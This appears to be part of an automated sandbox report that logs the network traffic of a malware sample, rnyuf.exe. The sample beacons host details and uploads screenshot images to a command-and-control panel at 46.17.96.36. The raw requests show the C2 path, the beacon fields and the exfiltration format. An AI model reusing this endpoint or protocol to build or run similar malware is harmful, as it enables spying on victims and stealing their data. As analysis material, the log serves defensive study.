                                        Host: 46.17.96.36
                                        Content-Length: 110710
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:44.274864912 CEST8970OUTData Raw: 2d 2d 2d 2d 2d 2d 32 35 32 37 64 36 65 65 33 36 65 35 64 39 31 63 65 64 39 30 37 36 33 33 62 37 38 37 39 37 36 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------2527d6ee36e5d91ced907633b787976cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:44.275065899 CEST8980OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:44.275419950 CEST8983OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:44.311511040 CEST8986OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:44.311619043 CEST9003OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:44.311647892 CEST9006OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:44.311659098 CEST9009OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:27:44.348050117 CEST9011OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:44.348236084 CEST9020OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:44.348299026 CEST9033OUTData Raw: 1c a2 16 0a 36 95 e0 48 07 5a bf 79 7f a3 c5 e3 ab fd 76 2d 6e d2 e2 d6 f0 de 6d 48 a1 9c 48 9e 64 12 2a ee 0d 18 1c b3 01 c1 3d 7d 39 a7 ed ea 59 bb 7f 37 e1 b0 4a 85 3b d9 3e a6 24 1a 3c af 15 ec b7 57 16 f6 29 63 70 96 d7 26 e3 7f ee dd b7 e3
                                        Data Ascii: 6HZyv-nmHHd*=}9Y7J;>$<W)cp&V$,Wn|/,76yqs*d$v5U]r;eex+\kl)BD]:'h<7 I\KYhqOU2}.KqcMp4M*R6v6
                                        Aug 29, 2021 22:27:44.462884903 CEST9082INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:44 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        87192.168.2.44982546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:44.496656895 CEST9082OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:44.571957111 CEST9083INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:44 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        88192.168.2.44982646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:44.703342915 CEST9084OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----2527d6ee36e5d91ced907633b787976c
                                        Host: 46.17.96.36
                                        Content-Length: 110710
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:44.703464031 CEST9084OUTData Raw: 2d 2d 2d 2d 2d 2d 32 35 32 37 64 36 65 65 33 36 65 35 64 39 31 63 65 64 39 30 37 36 33 33 62 37 38 37 39 37 36 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------2527d6ee36e5d91ced907633b787976cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:44.703607082 CEST9094OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:44.703680992 CEST9097OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:44.735836983 CEST9110OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:44.735969067 CEST9117OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:27:44.735999107 CEST9122OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:44.768089056 CEST9125OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:44.768218994 CEST9138OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:44.768326998 CEST9149OUTData Raw: 15 98 de 31 f0 af f0 db de d4 2d e3 2f 0d 76 86 f6 ba 15 54 fa 33 95 e1 2a 2e c6 e0 60 7b d1 91 5c f1 f1 9f 87 fb 45 79 4d 3e 33 d0 87 48 ee ff 00 4a 7c eb b0 be af 50 e9 33 4b 9a e6 7f e1 36 d1 07 fc b2 bb a5 1e 37 d1 47 fc b2 bb a3 99 0d 50 a9
                                        Data Ascii: 1-/vT3*.`{\EyM>3HJ|P3K67GP8\'Z0W_/'z?hnJW4TuDxIwC)SO5?64QhE<W>#ic]n1K'Ks}i3W3LsQ;LuVhW
                                        Aug 29, 2021 22:27:44.768354893 CEST9162OUTData Raw: ff 00 0a eb c5 7e 5e 7c cf 9f 6e 3a e7 ca 38 a8 aa b9 92 5e 66 94 e5 ca db 3b 78 8d ff 00 8e ae 25 95 6e e6 b1 d0 23 72 91 88 4e d9 2e 48 ea 49 ec 3f cf 5a 98 78 0b c3 6c cc 96 93 4d 0d d2 7f cb 48 6e 89 91 4f af 7f e5 4e b1 f3 bf e1 56 47 fd 97
                                        Data Ascii: ~^|n:8^f;x%n#rN.HI?ZxlMHnONVG?'gwc9ktBg>c?s]49*rQv:9]H9+Gh+_SAJ\8%_oGZ(1ATY%oW/,98]?R,'{5
                                        Aug 29, 2021 22:27:44.886362076 CEST9195INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:44 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        89192.168.2.44982746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:44.719124079 CEST9097OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:44.797847986 CEST9173INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:44 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        9192.168.2.44974446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:12.341972113 CEST1989OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:12.342061043 CEST1989OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:12.342262983 CEST1999OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:12.342380047 CEST2002OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:12.374804974 CEST2005OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:12.374846935 CEST2013OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:12.374861002 CEST2014OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:27:12.374886036 CEST2022OUTData Raw: 94 65 79 2b 6b 6b 2b fa 11 d2 d2 52 d7 a0 78 e2 d1 49 4b 9a 00 ea 3e 1d 3a c5 f1 0b 45 91 d8 2a 2d c6 59 98 e0 01 83 c9 af a8 bf b6 34 cf fa 09 59 ff 00 df f4 ff 00 1a f8 d6 8e d5 85 5a 3c ee f7 36 a7 5b 91 5a c7 d9 3f db 1a 5f fd 04 ec bf f0 21
                                        Data Ascii: ey+kk+RxIK>:E*-Y4YZ<6[Z?_!?gJ'<167g11XV dkSESV1>wpJZQ@z(0)h=6NXWde)bCgCEM})6-|Rz<EevJ)hBR
                                        Aug 29, 2021 22:27:12.376157999 CEST2027OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:12.407655001 CEST2033OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:12.407895088 CEST2048OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:27:12.513272047 CEST2096INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:12 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        90192.168.2.44982846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:44.935471058 CEST9196OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:45.009419918 CEST9196INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:44 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        91192.168.2.44982946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:45.120871067 CEST9197OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----2527d6ee36e5d91ced907633b787976c
                                        Host: 46.17.96.36
                                        Content-Length: 110710
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:45.120940924 CEST9197OUTData Raw: 2d 2d 2d 2d 2d 2d 32 35 32 37 64 36 65 65 33 36 65 35 64 39 31 63 65 64 39 30 37 36 33 33 62 37 38 37 39 37 36 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------2527d6ee36e5d91ced907633b787976cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:45.121165037 CEST9207OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:45.121269941 CEST9210OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:45.154658079 CEST9218OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:45.154912949 CEST9233OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
